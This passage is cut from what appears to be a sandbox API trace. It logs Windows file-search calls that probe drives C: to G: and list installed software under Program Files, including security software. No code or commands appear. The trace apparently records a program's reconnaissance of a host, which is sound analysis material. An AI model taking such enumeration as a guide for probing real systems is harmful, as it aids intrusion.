ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.529] FindFirstFileW (in: lpFileName="E:\\*", lpFindFileData=0x14d490 | out: lpFindFileData=0x14d490*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.540] FindFirstFileW (in: lpFileName="F:\\*", lpFindFileData=0x14d47c | out: lpFindFileData=0x14d47c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.549] FindFirstFileW (in: lpFileName="G:\\*", lpFindFileData=0x14d468 | out: lpFindFileData=0x14d468*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.569] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77c9f0 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdb1190, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdb1190, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbe49710, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe49710, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d997770, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0xbe235b0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe235b0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2e22d50, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xbe49710, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe49710, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bf03b0, ftCreationTime.dwHighDateTime=0x1d706ac, ftLastAccessTime.dwLowDateTime=0xb6d9250, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xb6d9250, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbe49710, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe49710, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xbdfd450, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdfd450, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbdfd450, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdfd450, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0174.569] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbe235b0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe235b0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0174.570] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbdfd450, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdfd450, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0174.570] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbe235b0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe235b0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0174.570] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb6b30f0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xb6b30f0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0174.570] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbdb1190, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdb1190, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0174.570] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbfec630, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbfec630, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0174.570] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0xb666e30, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xb666e30, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 1 [0174.570] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0xb666e30, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xb666e30, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 0 [0174.570] FindClose (in: hFindFile=0x77c9f0 | out: hFindFile=0x77c9f0) returned 1 [0174.579] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1373d4f0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0x1373d4f0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77c9f0 [0174.580] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1373d4f0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0x1373d4f0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbe49710, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe49710, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbdb1190, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdb1190, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb6b30f0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xb6b30f0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a959b90, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0xbe6f870, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe6f870, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 15", cAlternateFileName="MICROS~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbdb1190, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdb1190, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbe235b0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe235b0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xbe49710, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe49710, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdfd450, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdfd450, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbe235b0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbe235b0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdfd450, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdfd450, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0174.581] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0174.582] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xbdb1190, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xbdb1190, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0174.582] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xba6b350, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xba6b350, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0174.582] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0xba6b350, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xba6b350, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 1 [0174.582] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d4a0 | out: lpFindFileData=0x14d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0xba6b350, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0xba6b350, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 0 [0174.582] FindClose (in: hFindFile=0x77c9f0 | out: hFindFile=0x77c9f0) returned 1 [0174.591] FindFirstFileW (in: lpFileName="D:\\Program Files\\*", lpFindFileData=0x14d498 | out: lpFindFileData=0x14d498*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.616] FindFirstFileW (in: lpFileName="E:\\Program Files\\*", lpFindFileData=0x14d498 | out: lpFindFileData=0x14d498*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.625] FindFirstFileW (in: lpFileName="F:\\Program Files\\*", lpFindFileData=0x14d498 | out: lpFindFileData=0x14d498*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.635] FindFirstFileW (in: lpFileName="G:\\Program Files\\*", lpFindFileData=0x14d498 | out: lpFindFileData=0x14d498*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 